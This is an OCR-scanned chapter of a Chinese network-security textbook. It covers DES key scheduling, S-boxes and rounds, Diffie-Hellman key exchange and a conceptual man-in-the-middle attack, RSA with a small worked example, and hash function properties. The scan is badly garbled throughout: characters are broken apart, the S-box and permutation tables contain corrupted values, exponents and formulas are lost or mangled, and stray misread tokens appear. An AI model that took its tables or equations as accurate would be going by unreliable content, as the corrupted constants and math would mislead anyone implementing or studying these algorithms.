据 下 列 规 则 进行 : 循环 左 移 位 数 
本 本 
经 过 循环 左 移 得 到 的 C; .Di 经 过 压缩 置换 即 得 到 子 密 钥 天,(i 王 1,2,…,16)。 压 缩 置换 
也 称 作 置 换 选 择 ,位 就 是 从 56 位 中 选 出 48 位 , 表 4. 3 定义 了 压缩 置换 。 例 如 ,处 在 第 33 位 
位 置 的 那 一 位 在 输出 时 移 到 第 35 的 位 置 ,而 处 在 第 18 位 的 那 一 位 被 略 去 。 
4) 16 轮 迭 代 过 程 
DES 算法 有 16 次 迭代 ,迭代 如 图 4. 10 所 示 。 从 图 中 可 得 到 : 
人 
下 函数 的 实现 原理 是 将 尺 ;-; 进 行 扩展 置换 后 其 结果 与 ;进行 异 或 (外 按 位 模 2 加 ) ,并 
把 输出 内 容 执行 S 盒 蔡 代 与 已 盒 转 换 后 得 到 下 (Ri;_1 ,K;) ,其 原理 如 图 4.11 所 示 。 


64 位 密 钥 字符 串 玉 
密 钥 置换 
36 比特 
28 比 特 28 比 特 
Co Do 
1 T 
LS， LS， 
1 1 
ro Di 
=| 压缩 置换 = 48 位 Ki 
1 1 
LS LS， 
1 1 
C D; 
| 上 一 LE 二 一 4 人 人 [2] x Le 
LSie LSie 
T 1 
Ci6 Di6 
一 | 压缩 置换 一 = 48 位 Kis 配 了 
图 4.9 子 密 钥 的 产生 图 4.10 和 迭代 过 程 
表 4.3 压缩 置换 
14 Ew 11 24 1 5 8 28 15 6 21 10 
oa 19 12 4 26 8 16 7 27 20 13 g 
41 52 31 37 47 55 30 40 51 45 33 48 
44 49 39 56 34 53 46 42 50 36 29 32 
BI BiBe 行 :一 一 | 
行列 0 123456789101112131415 
B, 
0|12 1101592680133414751l 
Bs 1 |1015 42712956 113140138 
及 2|91415 52812370410113116 
[~-3|432129%515101I 了 1 7 60813 
Bs BB3B4Bs | 列 一 
Be 
bibyb3babsbe 行 : bibe=112=3 Se- 愈 子 3 行 9 列 


110011 列 : bbsbsbs=10012=9 ” 值 : 14=[00 
图 4.11 S 盒 的 计算 过 程 


扩展 置换 也 叫做 正 盒 ( 见 表 4.4), 它 将 数据 右 半 部 分 从 32 位 扩展 到 48 位 ,改变 了 位 的 
次 序 , 重 复 了 某 些 位 , 比 原 输入 长 了 16 位 ,数据 位 仍 取决 于 原 输 入 。 扩 展 置换 的 48 位 输出 
按 顺 序 分 成 8 组 ,每 组 6 位 ,分 别 输入 8 个 S 子 盒 ( 见 表 4.5) ,每 个 子 盒 输出 4 位 , 共 32 位 。 
假设 将 S 盒 的 6 位 的 输入 标记 为 bi、bs、b;、b4、bs 、bs， 则 Bb 和 6b 组合 构成 了 一 个 2 位 的 数 ， 


计算 绽 码 


山名 
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从 0 一 3, 它 对 应 着 S 表 中 的 一 行 。 从 bs 一 bs 构成 了 一 个 4 位 的 数 ,从 0 一 15, 对 应 着 表 中 的 
一 列 ,行列 交汇 处 的 数据 就 是 该 S 盒 的 输出 。 这 是 该 算法 的 关键 步骤 ,所 有 其 他 的 运算 都 
是 线性 的 ,易于 分 析 , 而 S 盒 是 非 线性 的 , 它 比 DES 其 他 任何 一 步 提供 了 更 好 的 安全 性 。 


表 4.4 扩展 置换 表 


32 1 2 3 4 5 4 5 6 Lg 8 Ey 
8 9 10 11 12 13 12 13 14 15 16 17 
16 17 18 19 20 21 20 21 22 23 24 25 
24 25 26 27 28 29 28 29 30 31 32 1 


0 1 2 3 4 5 6 ¥ 8 9 10 11 12 13 14 15 
0 14 4 13 1 2 15.% .型 8 3 10 6 12 5 人 0 
1 15 kd 4 14 2 13 1 10 6 12 11 本 5 3 
3 2 1 14 8 13 2 11 1 12 7 10 5 0 
3 15 12 2 4 多 1 党 5 11 3 14 10 0 6 13 
0 15 1 8 14 6 i 9 学 13 12 0 5 10 
1 13 4 4 15 2 8 14 12 0 本 10 9 11 5 
» 2 14 7 11 10 13 1 5 8 12 6 3 2 15 
3 13 8 10 1 3 15 4 11 6 12 5 14 9 
0 10 14 6 15 5 1 13 12 党 11 4 2 8 
1 13 7 9 3 6 10 2 8 14 12 11 15 
本 2 13 6 4 9 8 15 3 0 11 1 2 12 5 10 14 2 
3 和 10 13 0 6 9 8 区 4 15 14 11 5 2 12 
0 7 13 14 3 0 6 9 10 1 2 8 11 12 4 15 
1 13 8 11 5 6 15 0 3 4 7 2 12 1 10 14 9 
2 10 6 9 0 Ww 也 ? 13 15 1 3 14 5 2 8 4 
3 15 0 6 10 1 13 4 5 11 12 7 2 14 
0 2 12 4 ¥ 7 10 11 5 3 15 13 0 14 9 
1 14 11 2 12 ? 13 0 15 10 9 8 6 
入 2 4 2 1 Ww W013 8 15 9 12 5 3 0 14 
3 11 8 12 久 1 14 2 13 6 15 0 9 10 4 5 3 
0 1l12 11 10 15 9 2 6 13 3 4 14 7 5 11 
1 10 15 4 2 7 12 9 6 和 13 14 0 11 3 8 
入 2 14 15 5 2 8 12 3 7 0 4 10 13 11 6 
3 3 12 9 5 15 10 11 14 1 7 6 0 8 13 
0 11 2 14 15 0 8 13 3 12 9 7 5 10 6 : 
1 13 0 11 7 4 9 10 14 3 5 12 2 15 8 6 
和 2 1 4 11 13 12 3 7 14 10 15 6 8 0 5 9 2 
3 6 11 13 8 1 4 10 这 9 0 15 14 2 3 12 
0 13 2 8 4 6 15 -11 1 10 3 14 5 0 12 人 
a 1 15 13 8 10 3 12 6 好 0 14 9 2 
m 2 11 4 1 9 12 14 2 0 6 10 13 15 3 5 8 
3 2 1 14 7 4 10 8 13 15 12 9 0 3 5 6 11 


案例 1: 对 Si 盒 的 输入 是 100011, 则 输出 是 什么 ? 分 析 : 把 第 一 位 和 第 六 位 合并 ,得 到 
二 进 制 数 是 11 ,转化 成 十 进 制 数 是 3; 其 余 二 进 制 比特 表示 的 是 0001, 转 化 为 十 进 制 数 是 
1。 然 后 在 Si 盒 中 查找 第 3 行 第 1 列 的 数 ,对 应 的 十 进 制 数 12, 转 化 为 二 进 制 数 是 1100。 
因此 ,输入 100011 对 应 的 输出 是 1100。 

案例 2: 对 Se 盒 的 输入 是 110011, 则 输出 是 什么 ? 分析 如 图 4. 12 所 示 。 

也 盒 置换 ( 见 表 4. 6) 是 把 每 个 输入 位 映射 到 输出 位 ,任意 一 位 不 能 被 映射 两 次 ,也 不 能 
被 略 去 。 

表 4.6 PP 盒 置 换 表 


16 7 10 21 29 现 28 17 
1 15 23 26 5 18 31 20 
2 8 24 14 32 27 3 9 
19 13 30 6 网 i 4 25 
R-I(G32 位 ) 一 一 一 一 | 扩展 置换 
48 位 
K(48 位 ) 
Si S， Ss S4 Ss Se S7 Ss 
| | | 
32 位 
P 僵 置换 F(R K) 


图 4.12 下 函数 的 实现 原理 


5) 末 置 换 
末 置 换 IP"'( 见 表 4.7) 是 初始 置换 的 逆 过 程 ,DES 在 最 后 一 轮 后 , 左 半 部 分 和 右 半 部 
分 并 未 交换 ,而 是 将 Rs 和 Lu 并 在 一 起 形成 一 个 分 组 作为 末 置 换 的 输入 。 


表 4.7 逆 初始 置换 IP' 


40 8 48 16 56 24 64 32 
39 4 47 15 55 23 63 31 
38 6 46 14 54 22 62 30 
37 5 45 13 53 21 61 29 
36 4 44 12 52 20 60 28 
35 3 43 对 51 19 59 27 
34 2 42 10 50 18 58 26 
33 1 41 9 49 17 57 25 


3. DES 解密 分 析 
在 经 过 所 有 的 代替 、 置 换 、. 异 或 盒 循环 之 后 ,你 也 许 认为 解密 算法 与 加 密 算法 完全 不 同 。 
恰恰 相反 ,经 过 精心 选择 的 各 种 操作 .获得 了 一 个 非常 有 用 的 性 质 : 加 密 和 解密 使 用 相同 的 


计划 密码 


山名 


蕉 于 案例 的 网 络 安 会 技术 与 实践 


算法 。DES 加 密 和 解密 唯一 的 不 同 是 密 匙 的 次 序 相反 。 加 密 过 程 和 解密 过 程 可 总 结 如 下 。 
1) 加 密 过 程 
一 Lo Ro 一 IP(64bit 明文 ) 
Lr Ri<—Li_1@Df Riis, ki) i=1,"…,16 
(64bit 密 文 )<-IP-!(RieLi) 
2) 解密 过 程 
DES 的 加 密 运 算是 可 逆 的 ,其 解密 过 程 可 类 似 地 进行 。 
RisLis 一 IP(64bit 密 文 ) 
Ri < Li<R 四 FL i, ki) 1 一 16.… ,1 
(64bit 明文 )<IP- (RoLo) 
4. DES 安全 性 分 析 
DES 的 脆弱 性 : DES 的 安全 性 完全 依赖 于 所 用 的 密 钥 ,56 位 不 太 可 能 提供 足够 的 安 
全 性 。 
DES 的 半 公 开 性 : S 盒 的 设计 原理 至 今 未 公布 ,可 能 隐 含 有 陷阱 。 
几 种 攻击 的 计算 代价 : 强力 攻击 : 2” 次 尝试 ; 差分 密码 分 析 法 : 2” 次 尝试 ; 线性 密码 
分 析 法 : 2” 次 尝试 。 此 外 ,一 些 特殊 的 密 钥 还 将 大 幅 降 低 对 DES 攻击 的 计算 代价 : 
互补 性 : 若 明文 组 工 逐 位 取 补 , 密 钥 & 逐 位 取 补 , 且 y 二 DESi (zx), 则 有 y= 二 DESE (z)， 
称 这 种 特性 为 算法 上 的 互补 性 。 这 种 互补 性 会 使 DES 在 选择 明文 破译 下 所 需 的 工作 量 
减 半 。 
弱 密 钥 : DES 算法 在 每 次 迭代 时 都 有 一 个 子 密 钥 供 加 密 用 。 如 果 给 定 初始 密 钥 ,各 
轮 的 子 密 钥 都 相同 , 即 有 二 ,二 … 二 ko ,就 称 给 定 密 钥 为 弱 密 钥 (Weak key)。 
半 弱 密 钥 : 两 个 不 同 密 钥 将 同一 明文 加 密 成 相同 密 文 ,其 中 一 个 加 密 , 另 一 个 解密 。 


4.2 公开 密 钥 密码 


4.2.1 从 对 称 密码 到 非 对 称 密码 


1. 理解 非 对 称 密码 体制 

我 们 可 以 将 加 密 和 解密 的 过 程 , 看 做 是 给 一 扇 门 加 锁 和 解锁 的 过 程 。 对 通常 的 门 而 言 ， 
一 把 钥匙 既 可 以 锁 门 也 可 以 开门 。 对 于 对 称 密码 而 言 ,用 来 加 密 信 息 的 设置 与 解密 信息 的 
设置 是 一 样 的 ,这 样 的 设置 一 一 称 为 密 钥 一 一 必须 严格 保密 。 接 受 者 离 发 送 者 越 远 ,那么 传 
送 加 密 或 解密 的 密 钥 就 越 难以 保密 。 假 设 一 位 间谍 首脑 希望 手下 不 同 领域 的 间谍 人 员 都 向 
自己 发 送 安 全 的 汇报 信息 ,但 是 有 不 希望 他 们 读 懂 其 他 人 的 报告 ,因此 对 每 个 手下 需要 用 不 
同 的 密 钥 。 现 在 如 果 将 这 些 间 谍 人 员 换 成 数 以 百 万 计 的 网 络 购物 者 ,对 于 如 此 规模 的 业务 ， 
虽然 不 是 不 可 能 ,但 也 是 后 台 程 序 人 员 的 噩梦 ; 某 位 顾客 访问 网 站 时 ,他 不 能 立即 下 单 , 而 
需要 等 待 网 站 传送 过 来 的 安全 密 钥 。 因 此 “世界 万 维 网 ”World Wide Web) 就 变 成 了 “世界 
等 待 网 ”(World Wide Wait)。 

非 对 称 密码 系统 的 思想 简单 而 有 趣 , 它 就 像 是 一 扇 有 两 把 钥匙 的 门 : 钥匙 A 用 来 锁 门 ， 
而 另外 一 把 钥匙 B 用 来 开门 。 我 们 不 需要 对 钥匙 A 进行 加 密 , 因 为 拥有 钥匙 A 并 不 会 对 安 


全 造成 任何 伤害 。 

2. 对 称 密码 算法 的 主要 问题 

(1) 密 钥 管理 量 问题 : 两 两 分 别 用 一 对 密 钥 , 当 用 户 量 增 大 时 , 密 钥 空 间 急剧 增 大 。 

(2) 功能 问题 : 对 称 算法 无 法 实现 抗 否认 需求 一 一 数字 签名 。 

3. 非 对 称 密码 体制 的 基本 原则 

加 密 能 力 与 解密 能 力 是 分 开 的 ; 密 钥 分 发 简单 ; 需要 保存 的 密 钥 量 大 大 减少 , N 个 用 
户 只 需要 N 个 ; 可 满足 不 相识 的 人 之 间 保 密 通 信 ; 可 以 实现 数字 签名 ; 加 密 速 度 慢 , 常 用 
于 数字 签名 或 加 密 对 称 密 钥 。 


4.2.2 实现 : Diffie-Hellman 密 角 交换 


1976 年 ,Diffie 和 Hellman 在 New directions in cryptography 一 文中 首先 ?提出 了 
“ 非 对 称 密码 体制 ”的 概念 ,并 给 出 非 对 称 密码 算法 ,该 算法 的 目的 是 使 得 两 个 用 户 安全 地 交 
换 一 个 会 话 密 钥 ,通常 称 之 为 DH 协议 ,其 特点 为 : 发 送 方 和 接受 方 基于 公 钥 密码 体制 交换 
会 话 密 钥 ; 会 话 密 钥 采用 对 称 加 密 体制 加 密 需要 保密 传输 的 消息 。 

1. Diffie-Hellman 密 钥 交换 : 本 原 元 和 离散 对 数 

(1) 本 原 元 : 对 于 一 个 素数 g, 如 果 数 值 a mod g, a*mod g, …, a”!'mod g 是 各 不 相同 
的 整数 ,并 且 以 某 种 排列 方式 组 成 了 从 1 一 g 一 1 的 所 有 整数 , 则 称 整数 a 是 素数 g 的 一 个 本 
原 元 。 

案例 : 如 表 4. 8 所 示 , 若 素数 g 二 19, 可 以 看 出 , 当 a 二 2,a 二 3 时 ,满足 素数 g 的 本 原 元 
条 件 。 


表 4.8 满足 素数 4 的 本 原 元 


g=19, ar mod g, i=1,2,3,.,18 


s 


a a: a a a a a a a a a a a a a a a a 
1 | 和 1 1 1 1 1 1 1 1 1 1 对 E 1 1 
2 4 S16 1 TB 1 6 12 5 10 1 
3 9 8 Sor La 2 .0 0 5 lL 
4 16 7 0 J \ | 5 L 4 16 7 9 17 11 6 5 1 
5 6 6 1 5 下 | Wi 7 | 7 16 4 


(2) 离散 对 数 : 对 于 一 个 整数 5b 和 素数 g 的 一 个 本 原 元 a ,可 以 找到 一 个 唯一 的 指数 i， 
使 得 0 三 w mod g (0<i 二 gq 一 1) 成 立 , 则 指数 i 称 为 5 的 以 a 为 基数 的 模 g 的 离散 对 数 。 

(3) 离散 对 数 的 计算 : 对 于 > 三 gf mod g(g 为 大 素数 ). 已 知 g, x, g 计算 y 是 容易 
的 ; 已 知 g, y, g, 计算 xz 是 非常 困难 的 。 

2. Diffie-Hellman 密 钥 交换 : 算法 

(1) 用 户 A 和 用 户 B 之 间 安 全 交换 会 话 密 钥 , 已 知 一 个 大 素数 g 和 一 个 整数 a ,其 中 整 
数 a 是 素数 g 的 一 个 本 原 元 。 

。 用 户 A 随机 选择 一 个 数 za 二 gq, 计算 ya 三 a** mod g。 


@ James Ellis (UK CESG) 于 1970 年 秘密 地 提出 了 这 个 概念 ,但 并 没有 公开 发 表 。 


计算 绽 码 


贡 上 站 


秦 于 案例 的 网 络 安全 技术 与 实践 


。 用 户 B 随机 选择 一 个 数 zs 二 g, 计 算 ys= ce mod g。 

。 用 户 A 和 用 户 B 分别 公 开 ya 、ya。 

。 用 户 A 计算 妈 三 (ys)”* mod gq, 用户 B 计 算 二 (ya) mod g,k 即 为 共享 的 会 

话 密 钥 。 

(2) k= (ys) mod gS (a)™s mod g = (a™s)s modg 二 (ya) modg 三 k,。 

3. Diffie-Hellman 密 钥 交换 : 案例 

全 局 公开 参数 : g 二 97, a 二 5(5 是 97 的 素 根 ) 。 

A 选择 私 钥 XA 王 36,B 选择 私 钥 Xe 一 58。 

A 计算 公 钥 YA 一 5 mod 97 一 50。 

也 计算 公 钥 Ye 一 55 mod 97 一 44。 

A 与 B 交 换 公开 密 钥 ， 

A 计算 会 话 密 钥 : K 二 Ys*^ mod q 一 443 mod 97 一 75。 

B 计算 会 话 密 钥 : 天 一 YAS mod q 一 505 mod 97 一 75。 

4. Diffie-Hellman 密 钥 交 换 : 算法 安全 性 

(1) Deffie-Hellman 密 钥 交 换算 法 安全 性 源 于 在 有 限 域 上 计算 离散 对 数 , 它 比 计算 指 
数 更 为 困难 。 攻 击 者 只 知道 a、qg、ya 、ys ,除非 计算 离散 对 数 ,恢复 za .za ,否则 无 济 于 事 。 

(2) a 和 g 的 选取 :(g 一 1)/2 应 该 是 一 个 素数 ,并且 g 应 该 足够 大 : 系统 的 安全 性 取决 
于 与 g 同样 长 度 的 数 的 因子 分 解 的 难度 ; 可 以 选择 任何 模 的 本 原 元 a ,通常 选择 最 小 的 a 
(一 般 是 一 位 数 ) 。 


4.2.3 中 间 人 攻击 


攻击 者 不 必 针 对 DH 协议 中 的 困难 问题 进行 暴力 破解 ,可 以 采用 其 他 巧妙 的 方法 得 到 
相应 的 敏感 信息 ,中 间 人 攻击 就 是 典型 的 例子 。 

1. 攻击 过 程 

用 户 Alice 和 用 户 Bob 之 间 安 全 交换 会 话 密 钥 ,已 知 一 个 大 素数 g 和 一 个 整数 a ,其 中 
整数 a 是 素数 g 的 一 个 本 原 元 。 

(1) Alice 随机 选择 一 个 数 zs 二 gq, 计 算 ya 三 a** mod g, 发 送 给 Malice(Bob); 

(2) 攻击 者 Malice 截获 信息 (1) ,并 选择 一 个 随机 数 x 二 gq, 计算 yw 三 a” mod g, 发 送 
给 Bob; 

(3) Bob 随机 选择 一 个 数 zs 二 dg ,计算 ys 三 aa mod gq, 发 送 给 Malice( Alice); 

(4) Malice 截获 信息 (3) ,并 将 yx 三 a”mod d 发 送 给 Alice。 

(5) 最 终 三 方 经 过 本 地 计算 ,形成 两 个 会 话 密 钥 Ki 二 a***” mod g, Ks 二 a”s*” mod g， 
Alice 只 拥有 Ki ,Bob 只 拥有 开 。 ,而 Malice 同时 拥有 KK; 和 K; ,这样 ,Alice 和 Bob 所 有 的 
通信 信息 均 被 Malice 采用 ”截获 一 解密 (其 中 一 个 密 钥 ) 一 加 密 ( 另 一 个 密 钥 ) 一 转发 ”的 方 
式 得 到 明文 ,同时 Alice 和 Bob 以 为 拥有 相同 的 会 话 密 钥 进行 秘密 通信 ,如 图 4. 13 所 示 。 

2. 中 间 人 攻击 分 析 

中 间 人 攻击 存在 的 根本 原因 是 DH 密 钥 交换 协议 不 支持 认证 功能 ,需要 额外 的 身份 认 
证 机 制 来 保证 安全 性 。 此 外 , 若 不 存在 完善 的 认证 功能 , 则 不 同 层次 ,不同 功能 的 安全 协议 
都 存在 中 间 人 攻击 的 安全 隐患 。 


Alice Malice Bob 
(Da=a™ modg 截获 CO)ywEammody 
F 一 一 一 一 
Cnmodg | 转发 ! 截获 (3) ye=a*mod g 
Ki=(a”"y* modg Ki=(a*)y” modg Ks=(a"ysmodg 
=a™*Xm mod 4 =rAxm mod 4 =craxmmod 了 
K2=(Ce)m modg 
本 地 计算 =a™ ”mod4 本 地 计算 
(5) Exi(message) ”一 截获 一 解密 (K) 一 加密 (K2) 一 转发 Exs(message1) 
ExKi(message>) 一 转发 一 加 密 (K) 一 ”解密 (K2) 一 截获 一 ”Ba(message>) 


图 4.13 ”中间人 攻击 示意 图 


4.2.4 RSA 密码 系统 : 凑 成 欧 拉 定理 


RSA 公 钥 密码 体制 是 由 麻 省 理工 学 院 的 Ron Rivest、Adi Shamir 和 Leonard Adleman 
于 1976 年 提出 ,1978 年 正式 发 表 的 一 种 可 将 加 密 密 钥 公开 的 密码 体制 。 至 今 为 止 仍 被 公 
认为 是 公 钥 密码 体制 中 最 优秀 的 加 密 算法 ,被 认为 是 密码 学 发 展 史 上 的 第 二 个 里 程 碑 。 它 
是 一 种 特殊 的 可 逆 模 指数 运算 的 加 密 体制 ,其 理论 基础 是 数论 中 的 一 条 重要 论断 : 求 两 个 
大 素数 之 积 是 容易 的 ,而 将 一 个 具有 大 素数 因子 的 合 数 进行 分 解 却 是 非常 困难 的 0?。 除 了 
用 于 加 密 之 外 , 它 还 能 用 于 数字 签名 和 身份 认证 。 

1.RSA 公 钥 密码 体制 

(1) 选取 两 个 不 同 的 大 素数 p 和 9g。 

(2) 计算 =pq( 公 开 ) ,gm)= 二 (p 一 1) (gq 一 1)( 欧 拉 函 数 )。 

(3) 随机 选取 正 整数 e,1 二 e 二 p(n) ,满足 gcd(e,q(n)) 二 1,e 是 公开 的 加 密 密 钥 。 


Q@ RSA 困难 问题 : 科 尔 教授 的 演讲 

在 1903 年 ,纽约 哥伦比亚 大 学 的 数学 教授 弗兰克 内 尔 森 * 科 尔 为 美国 数学 学 会 做 了 一 场 有 趣 的 演讲 。 他 一 言 不 
发 ,在 黑板 一 边 写 下 一 个 梅森 数 ,在 另 一 边 写 下 两 个 数 的 乘积 ,在 中 间 划 上 一 个 等 号 ,然后 结束 了 演讲 。 

257—1=193 707 721X761 838 257 287 

所 有 的 听众 都 站 起 来 鼓掌 ,这 在 数学 界 中 是 很 难得 见 到 的 景象 。 即 使 对 于 20 世纪 初 的 数学 家 而 言 ,将 两 个 数 相 乘 并 不 
是 很 难 的 事 ,但 他 们 为 何如 此 激动 ? 因为 科 尔 所 做 的 工作 正好 相反 。 在 1876 年 数学 家 已 经 知道 这 个 20 位 的 梅森 数 257 
一 1 不 是 素数 ,而 是 两 个 更 小 数 的 乘积 ,然而 没 人 知道 这 两 个 数 是 什么 。 利 用 3 年 中 的 每 个 星期 天 的 下 午 , 科 尔 终于 分 解 
出 这 个 数 的 两 个 素 因子 。 

科 尔 在 1903 年 进行 的 计算 被 认为 是 数学 趣闻 一 一 他 获得 的 掌声 主要 是 献 给 他 艰苦 的 工作 ,而 非 问 题 本 身 蕴涵 的 重 
要 性 。 现 在 ,这 样 的 素数 分 解 问题 已 不 再 是 周 日 下 午 用 来 打发 时 间 的 游戏 ,而 成 为 现代 密码 破译 的 核心 。 数 学 家 已 经 发 
明了 一 种 方法 ,将 这 样 的 素数 分 解难 题 融入 密码 中 去 ,从 而 保护 因特网 上 的 金融 安全 。 银 行 和 电子 商务 公司 利用 足够 长 
的 整数 来 保证 自己 金融 传输 的 安全 , 赌 的 就 是 一 一 在 目前 一 一 找到 这 些 整数 的 素 因 子 需要 极 长 的 时 间 。 同 时 ,这 些 新 的 
数学 密码 也 被 用 来 解决 密码 学 中 的 一 些 顽固 问题 。 


计划 密码 
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(4) 计算 4d, 满足 de 三 1(mod gp(n))。d 是 保密 的 解密 密 钥 。 

(5) 加 密 变 换 ; 对 明文 eE 2Z, ,明文 为 (2Z, 为 明文 空间 ) c= 二 mmod n。 

(6) 解密 变换 : 对 密 文 cEZ, ,明文 为 m= 二 co mod n。 

可 以 证 明 , 解 密 变 换 是 加 密 变换 的 逆 变 换 。 

案例 : (1) 生成 密 钥 : 选择 两 个 互 质 的 质数 刀 一 11,q 一 23,z 一 11 * 23 一 253; (p 一 1) 
(g 一 1) 二 220, 取 e 二 3; 由 de(mod 220) 一 1, 得 4 一 147; 即 保密 的 解密 密 钥 为 4 二 147 ,公开 
的 加 密 密 钥 公 钥 为 e 王 3,z 一 253; 明文 空间 为 Z,{0,1,2,… ,251,252)。 

(2) 加 密 原 文 : 假设 原文 m 的 数字 为 165, 用 公 钥 加 密 原文 。C 王 165? mod 253 二 110。 

(3) 解码 密 文 : 允 王 1104 mod 253 二 165,m 二 mm ,由 此 可 以 看 出 RSA 算法 的 一 般 过 程 。 

2. RSA 算法 数学 证 明 

RSA 算法 的 数学 基础 是 数论 中 的 欧 拉 定理 。 

欧 拉 定理 : 车 整数 a 和 nn 互 素 , 则 ar"” 三 1 mod n, 其 中 2p(2) 是 比 nn 小 但 与 互 素 的 正 
整数 个 数 。 

推论 (Fermat) : 车 p 是 素数 ,gcd (a,p) 二 1, 则 a?7! 寺 1 mod p。 

由 RSA 算法 可 知 : ed 三 1(mod(q(n)), 因 此 必定 存在 非 负 数 整数 ,使 得 等 式 ed 二 
kp(n) 十 1 成 立 , 这 样 对 于 明文 mE[1,n 一 1, 应 用 欧 拉 定 理 有 : 

Ds (Ep Cm))= Dae) 一 c = (Ep Cm))’ = (Gm) = me? ®t 


=m(m "=m(modn)=m 
同 理 可 证 Ey (Ds (4m)) 二 mw, 因此 Ey (Ds (12)) 二 Dy (Ep (m)) 二 m, 这 说 明 RSA 既 可 以 用 
于 加 密 , 又 可 以 用 于 数字 签名 。 

RSA 的 安全 性 依赖 于 大 数 的 因数 分 解 的 困难 性 , 即 : 求 两 个 大 素数 的 乘积 在 计算 上 是 
容易 的 ,但 要 分 解 两 个 大 素数 的 积 在 计算 上 则 是 困难 的 。 高 斯 的 素数 定理 ?告诉 我 们 60 位 
素数 足够 的 多 ,以 至 于 地 球 上 每 个 原子 都 可 以 分 到 自己 的 一 对 素数 。 不 仅 如 此 ,你 赢得 国家 
彩票 的 几率 都 要 大 于 两 个 不 同 原子 获得 相同 一 对 素数 的 几率 。 

3. RSA 密码 安全 性 简 析 

从 数学 上 从 未 证 明 过 需要 分 解 才能 从 c 和 e 中 计算 出 m; 可 通过 猜测 (p 一 1)(g 一 1) 
的 值 来 攻击 RSA ,但 这 种 攻击 没有 分 解 n 容易 ; 可 尝试 每 一 种 可 能 的 d, 直 到 获得 正确 的 一 
个 ,这 种 穷 举 攻击 还 没有 试图 分 解 n 更 有 效 ; 129 位 十 进 制 数字 的 模 数 是 能 分 解 的 临界 数 ， 
nn 应 该 大 于 这 个 数 。 


4.3 散 列 函数 


4.3.1 我 的 “ 奶 栈 ”完整 么 


对 称 密码 体制 和 非 对 称 密码 体制 都 是 保证 消息 在 传输 时 的 机 密 性 ,但 消息 在 传输 途中 
被 主动 攻击 (如 对 消息 的 内 容 、 顺 序 和 时 间 的 算 改 以 及 重 发 等 ) ,就 需要 散 列 函 数 来 介入 , 散 


@ 素数 定理 : 对 正 实数 z, 定 义 x(z) 为 不 大 于 z 的 素数 个 数 。x(z) < z/ln zx 其 中 In z 为 x 的 自然 对 数 。 


列 函 数 在 数据 完整 性 验 认证 .数字 签名 等 领域 有 广泛 应 用 。 

一 个 散 列 函数 昌 (Hash) 是 一 个 有 效 的 确定 性 算法 ?, 如 MD5、SHA1 等 。 它 可 将 任意 
长 度 的 先 特 串 输入 zE {0,1) 映射 到 一 个 定 长 比特 串 , 即 太 : 0,1) 一 {0,1)"。 长 度 用 
| 五 | 表 示 。 

希望 散 列 函数 具有 以 下 性 质 。 

(1) 基本 属性 : 函数 的 输入 可 以 是 任意 长 ,函数 的 输出 是 固定 长 。 

(2) 可 有 效 计 算 : 存在 一 个 多 项 式 时 间 算 法 ,输入 ,输出 H(z)。 

(3) 单 向 性 ( 单 向 Hash 函数 ): 给 定 一 个 哈 希 值 h, 找 到 一 个 原 像 输入 zz, 使 得 H(z) 二 
在 计算 上 是 不 可 行 的 。 

(4) 抗 弱 碰撞 性 ( 弱 单 向 Hash 函数 ): 给 定 一 个 输入 xz, 找 出 另外 一 个 不 同 的 输入 y, 使 
得 H(z)==H(y), 在 计算 上 不 可 行 。 

(5) 抗 强 碰撞 性 ( 强 单 向 Hash 函数 ) : 找 出 两 个 不 同 的 输入 zx 和 ,使 得 H(z)==H(y) 
在 计算 上 不 可 行 。 

性 质 的 补充 说 明 : 前 两 条 是 Hash 函数 用 于 消息 认证 的 基本 要 求 ; 第 三 条 单 向 性 用 于 
带 秘密 值 的 认证 技术 ,如 : 假设 待 发 送 消 息 为 m,c 二 昌 (s ‖m) ,如 果 能 求 c 的 逆 s mm, 则 秘 
密 值 ; 泄露 ; 抗 弱 碰 撞 性 用 于 防止 Hash 值 被 加 密 时 伪造 ,如 : 假设 已 知 zx 能 找到 y ,使 得 
H(z) 二 Hl(y) 成 立 , 即 使 Hash 值 被 加 密 .也 可 以 用 y 伪造 x ; 强 单 向 性 用 于 抵抗 生日 攻击 。 

Hash 函数 的 主要 用 途 在 于 提供 数据 的 完整 性 校 验 和 提高 数字 签名 的 有 效 性 ,目前 国 
际 上 已 提出 了 许多 Hash 函数 的 设计 方案 。 这 些 Hash 函数 的 构造 方法 主要 可 分 为 以 下 
3 类 ， 

(1) 基于 某 些 数学 难题 如 整数 分 解 .离散 对 数 问题 的 Hash 函数 设计 。 

(2) 基于 某 些 对 称 密码 体制 如 DES 等 的 Hash 函数 设计 。 

(3) 不 基于 任何 假设 和 密码 体制 直接 构造 的 Hash 函数 。 

其 中 第 三 类 Hash 函数 有 著名 的 SHA-1、SHA-256、SHA-384、SHA-512、MD4、MD5、 
RIPEMD 和 HAVAL 等 。 


4.3.2 钨 洞 原理 与 随机 预言 


1. 随机 预言 

随机 预言 模型 (Random Oracle Model) 又 称 为 理想 Hash 模型 ,是 由 Bellare 和 
Rogaway 在 1993 年 提出 来 的 ,其 加 密 Hash 函数 被 认为 是 在 一 个 适当 范围 内 随机 选择 的 函 
数 。 随 机 预言 模型 定义 为 : RO 模型 提供 了 一 个 “理想 的 "Hash 函数 的 数学 模型 。 在 这 个 
模型 中 ,随机 从 F 中选 出 一 个 Hash 函数 及 :zy, 仅 允许 预言 机 访问 函数 hh。 这 意味 着 不 
会 给 出 一 个 公式 或 者 算法 来 计算 函数 的 值 。 因 此 ,计算 h(xz) 的 唯一 方法 是 询问 预言 机 。 
基于 这 种 模型 的 函数 性 质 如 下 : 

(1) 如 果 给 定 一 个 任意 长 度 的 信息 ,预言 就 创建 并 给 出 一 个 固定 长 度 的 信息 摘要 ,这 个 
信息 摘要 是 0 和 1 的 随机 串 。 预 言 把 信息 和 信息 摘要 记录 起 来 。 


@ 能够 把 任意 有 限 长 的 消息 串 M 映射 成 某 一 固定 长 度 的 输出 串 h 的 一 种 函数 。 这 个 输出 串 h 称 为 该 消息 串 M 
的 消息 摘要 (message digest) 或 指纹 (fingerprint) 。 


计算 绽 码 


山 信 潞 
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(2) 如 果 给 定 一 个 具有 摘要 的 信息 ,预言 就 可 以 很 简单 地 给 出 记录 当中 的 摘要 。 

(3) 新 信息 的 摘要 要 从 以 前 的 摘要 当中 独立 选 出 。 这 就 意味 着 预言 不 能 用 一 个 公式 或 
算法 来 计算 摘要 。 

理解 随机 预言 模型 ; 

(1) 模型 一 一 模型 是 对 某 种 系统 的 一 种 抽象 ,描述 该 系统 设计 中 的 相关 的 公共 特征 , 清 
楚 地 认识 设计 的 本 质问 题 , 即 抓 住 问题 的 本 质 。 

